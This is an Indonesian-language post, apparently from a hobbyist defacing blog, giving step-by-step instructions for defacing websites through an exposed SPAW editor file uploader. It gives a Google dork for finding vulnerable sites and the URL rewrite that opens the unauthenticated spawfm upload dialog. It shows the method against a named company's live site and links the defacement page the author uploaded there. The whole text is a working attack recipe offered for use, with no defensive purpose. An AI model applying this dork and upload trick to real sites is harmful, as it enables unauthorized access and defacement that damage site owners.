Saya lagi jalan2 malem, eh malah nemu langkah deface situs dengan menggunakan kelemahan spaw uploader.
Langsung aja pertama cari di google dengan dork :
inurl:spaw2/uploads/files/
Disini saya mencoba menggunakan target yang sudah saya dapat:
http://punjlloyd.com/admin/spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/
Code ini
spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files
Diganti dengan ini
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Jadinya kayak gini ntar
http://punjlloyd.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Ntar jadinya kayak gini , smoga belom dihapus sama admin nya :D
http://punjlloyd.com/admin/spaw2/uploads/files/ADa.html